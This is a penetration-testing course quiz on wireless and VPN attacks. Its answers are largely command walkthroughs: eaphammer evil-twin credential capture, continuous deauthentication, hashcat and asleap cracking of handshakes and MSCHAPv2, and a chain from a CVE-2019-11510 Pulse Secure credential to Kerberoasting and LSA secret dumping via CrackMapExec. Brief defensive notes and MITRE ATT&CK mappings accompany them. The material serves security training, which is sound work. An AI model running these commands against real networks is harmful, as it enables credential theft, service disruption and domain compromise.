Chapter 3.4 Quiz - Wireless & VPN Attack Techniques
Quiz Mode - All answers are hidden under collapsible sections. Attempt each question before revealing the answer.
Question 1
You run airodump-ng wlan0mon and observe a corporate network CorpNet with WPA2-Enterprise (AUTH: MGT) and no clients currently connected. You cannot wait hours for a client. Describe the attack path that can still yield crackable credentials without any client being present.
Reveal Answer
Answer: Deploy a rogue AP (evil twin) using hostapd-wpe or eaphammer to intercept EAP authentication when clients connect - and use the PMKID attack against the AP itself for WPA2-Personal context (not applicable here), or harvest MSCHAPv2 credentials when the first client associates.
More specifically for WPA2-Enterprise with no clients:
The correct attack is a rogue RADIUS evil twin - you don't need existing clients captured; you wait for them to arrive and authenticate to your AP instead of the real one.
# Step 1: Configure eaphammer matching the target enterprise network
python3 eaphammer \
-i wlan0 \
--channel 6 \
--auth wpa-eap \
--essid "CorpNet" \ # Exact SSID match
--negotiate gtc-downgrade \ # Try to force EAP-GTC (plaintext)
--creds # Capture credentials
# Step 2: If GTC downgrade fails, fall back to PEAP/MSCHAPv2 capture
python3 eaphammer \
-i wlan0 \
--channel 6 \
--auth wpa-eap \
--essid "CorpNet" \
--creds
# Captures MSCHAPv2 challenge/response when client connects
# Step 3: Deauthenticate clients from real AP to force re-association to yours
# (Active - only after rogue AP is running)
aireplay-ng wlan0mon \
--deauth 0 \ # Continuous
-a <real_AP_BSSID> # Target real AP
# Step 4: Crack captured MSCHAPv2
asleap \
-C <challenge> \
-R <response> \
-W /usr/share/wordlists/rockyou.txt
Key defensive control defeated by this attack: Clients that don't validate the RADIUS server certificate (no ca_cert in wpa_supplicant.conf) will authenticate to any RADIUS server, including a rogue one. The fix is strict certificate validation with subject pinning.
MITRE ATT&CK: T1557.004 (Adversary-in-the-Middle: Wi-Fi), T1465 (Rogue Wi-Fi Access Point)
Question 2
A penetration tester captures a 4-way handshake for a WPA2-PSK network named HomeNetwork_5G. After 12 hours of cracking with rockyou.txt and best64 rules, there is no result. The client's router was purchased in 2021 from a major ISP. What two alternative cracking strategies should be tried next, and why are they appropriate for this specific scenario?
Reveal Answer
Answer:
Strategy 1: ISP default password mask attack
Most ISPs ship routers with a default password printed on a label - typically a fixed-length pattern of digits, alphanumerics, or a dictionary word + number combination. These patterns are well-documented and trivially maskable:
# Common ISP default formats:
# 8 lowercase + 4 digits (many UK/EU ISPs)
hashcat -m 22000 handshake.hc22000 \
-a 3 "?l?l?l?l?l?l?l?l?d?d?d?d"
# 10 digits (some US cable ISPs)
hashcat -m 22000 handshake.hc22000 \
-a 3 "?d?d?d?d?d?d?d?d?d?d"
# Serial number-based pattern: letters + digits (e.g., "ARRIS" + 8 hex chars)
hashcat -m 22000 handshake.hc22000 \
-a 3 "?u?u?u?u?l?l?d?d?d?d"
# Hybrid: ISP brand word + digits
hashcat -m 22000 handshake.hc22000 \
-a 6 /tmp/isp_words.txt "?d?d?d?d?d?d?d?d"
# SSID-based password (very common): router uses SSID suffix as password seed
# "HomeNetwork_5G" → try "Network5G", "5G12345678", last 8 of BSSID
echo "HomeNetwork5G" | hashcat -m 22000 handshake.hc22000 --stdin
Strategy 2: BSSID-seeded default password generation
Many router models generate their default Wi-Fi password algorithmically from the BSSID (MAC address). Tools like routersploit and dedicated wordlist generators exploit this:
# Extract BSSID from capture
hcxpcapngtool --info=stdout handshake.hc22000 | grep "BSSID"
# e.g., BSSID = AA:BB:CC:DD:EE:FF
# RouterKeygen - generates default keys for common router models
# based on BSSID, SSID, and model-specific algorithms
python3 routerkeygen.py \
--bssid AA:BB:CC:DD:EE:FF \
--ssid "HomeNetwork_5G"
# wpa-sec known default password databases
# https://wpa-sec.stanev.org - submit hash, check against known defaults
# Identify router vendor from BSSID OUI (first 3 octets)
curl -s "https://api.macvendors.com/AA:BB:CC"
# Knowing "ARRIS", "Technicolor", "Sagemcom" etc. narrows the default key algorithm
Why these are appropriate: rockyou.txt fails because ISP default passwords are not common human-chosen passwords - they're algorithmically generated strings that don't appear in breach databases. The 2021 purchase date and ISP-provided nature strongly suggest the default label password is still in use - many home users never change it.
MITRE ATT&CK: T1110.002 (Brute Force: Password Cracking)
Question 3
During an external penetration test you identify that the target's VPN gateway runs Pulse Secure version 9.0R1. CVE-2019-11510 is confirmed exploitable. After reading the session file, you find a username/password pair. Describe the next three steps to move from this credential to domain access.
Reveal Answer
Answer:
Step 1 - Authenticate to the VPN with the obtained credential
# Use the extracted credentials to establish a legitimate VPN session
# The path traversal gave us: username=jsmith, password=P@ssw0rd123
# Connect via OpenConnect (open-source Pulse Secure client)
openconnect \
--protocol=pulse \ # Pulse Secure protocol
--user=jsmith \
vpn.target-corp.com
# Enter password when prompted
# Alternatively use the official Pulse Secure client
# Or test via web login: https://vpn.target-corp.com
Step 2 - Establish network connectivity and enumerate the internal network
Once the VPN session is up, you have a routed path into the corporate network:
# Check what routes were pushed by the VPN
ip route show # What subnets are now accessible?
cat /etc/resolv.conf # What internal DNS server was assigned?
# Discover live hosts in the internal range
nmap -sn 10.0.0.0/8 --min-rate 500 # Ping sweep
# Enumerate internal DNS - get a host map for free
dig axfr @<internal_dns_ip> corp.local # Attempt zone transfer
# Or reverse lookup the DC range:
for i in $(seq 1 254); do
host 10.0.1.$i <internal_dns_ip> 2>/dev/null | grep "domain name pointer"
done
# Find the Domain Controller
nmap -p 88,389,445,636 10.0.0.0/24 --open # Kerberos + LDAP + SMB = DC
Step 3 - Leverage the credential for AD authentication and lateral movement
# The VPN credential is likely also a domain credential - test it directly
cme smb 10.0.1.0/24 \
-u jsmith \
-p 'P@ssw0rd123' \
-d CORP \
--continue-on-success
# If domain credential confirmed - enumerate AD
impacket-GetUserSPNs \
"CORP/jsmith:P@ssw0rd123@10.0.1.10" \ # DC IP
-dc-ip 10.0.1.10 \
-request # Kerberoast all SPNs immediately
# Enumerate all AD users for AS-REP roasting
impacket-GetNPUsers \
"CORP/jsmith:P@ssw0rd123" \
-dc-ip 10.0.1.10 \
-format hashcat
# Check if jsmith has local admin anywhere (often VPN users are IT staff)
cme smb 10.0.0.0/24 -u jsmith -p 'P@ssw0rd123' -d CORP
# Dump LSASS on any host where jsmith is local admin
cme smb 10.0.1.50 \
-u jsmith -p 'P@ssw0rd123' -d CORP \
--lsa # Dump LSA secrets
MITRE ATT&CK: T1190 (Exploit Public-Facing Application: CVE-2019-11510), T1078 (Valid Accounts), T1021.002 (Remote Services: SMB)
Question 4
A security engineer says "We use WPA3 everywhere so we're safe from Wi-Fi credential attacks." Identify three specific conditions under which WPA3 deployments remain vulnerable to credential or session compromise, with the technical mechanism for each.
Reveal Answer
Answer:
Condition 1: WPA3 Transition Mode (mixed WPA2/WPA3)
Most WPA3 deployments run in transition mode to support legacy clients. The AP advertises both WPA3-SAE and WPA2-PSK. An attacker sets up an evil twin advertising only WPA2, and WPA3-capable clients that haven't enabled mandatory WPA3 will downgrade and connect with WPA2.
# Verify transition mode
airodump-ng wlan0mon | grep "SAE+PSK" # Transition mode indicator
# Deploy WPA2-only evil twin with same SSID
# Client downgrades → 4-way handshake captured → offline crack possible
# (Defeats SAE's offline cracking resistance entirely)
Condition 2: Dragonblood Side-Channel Attacks (CVE-2019-9494)
The SAE Dragonfly handshake's timing and cache access patterns during the hunting-and-pecking algorithm vary based on the password. An attacker performing many SAE interactions and measuring response times can construct an oracle that significantly reduces the passphrase search space.
python3 dragonslayer.py \
--bssid AA:BB:CC:DD:EE:FF \
--ssid "WPA3Network" \
-i wlan0mon \
--attack timing # Timing oracle - reduces cracking complexity
# After collecting ~thousands of timing samples, partial passphrase bits recovered
# Combined with targeted wordlist - feasible against weak passphrases
Condition 3: WPA3-Enterprise with Improper Certificate Validation
WPA3-Enterprise still uses EAP (PEAP/MSCHAPv2 or EAP-TLS) for user authentication. If the client supplicant doesn't validate the RADIUS server certificate, a rogue AP attack is identical to the WPA2-Enterprise case - the SAE layer protects the key exchange but not the EAP authentication inside it.
# Rogue RADIUS server still works if ca_cert not configured
python3 eaphammer \
-i wlan0 \
--auth wpa3-eap \ # WPA3-Enterprise mode
--essid "SecureCorpWPA3" \
--creds
# If client has no ca_cert pinned → MSCHAPv2 captured → crackable
# WPA3 at L2 does not compensate for missing certificate validation at L7
# Detection gap: many WPA3 enterprise deployments inherited wpa_supplicant
# configurations from WPA2 deployments - missing ca_cert is common
Summary table:
| Condition | WPA3 Feature Bypassed | Mechanism |
|---|---|---|
| Transition mode | SAE offline crack resistance | Downgrade to WPA2; 4-way handshake capturable |
| Dragonblood timing | SAE brute-force resistance | Timing oracle reduces passphrase search space |
| No cert validation | EAP session security | Rogue RADIUS captures MSCHAPv2 regardless of SAE |
MITRE ATT&CK: T1557.004, T1465 (Rogue Wi-Fi), T1110.002 (Password Cracking)
End of Quiz 3.4 - Wireless & VPN Attack Techniques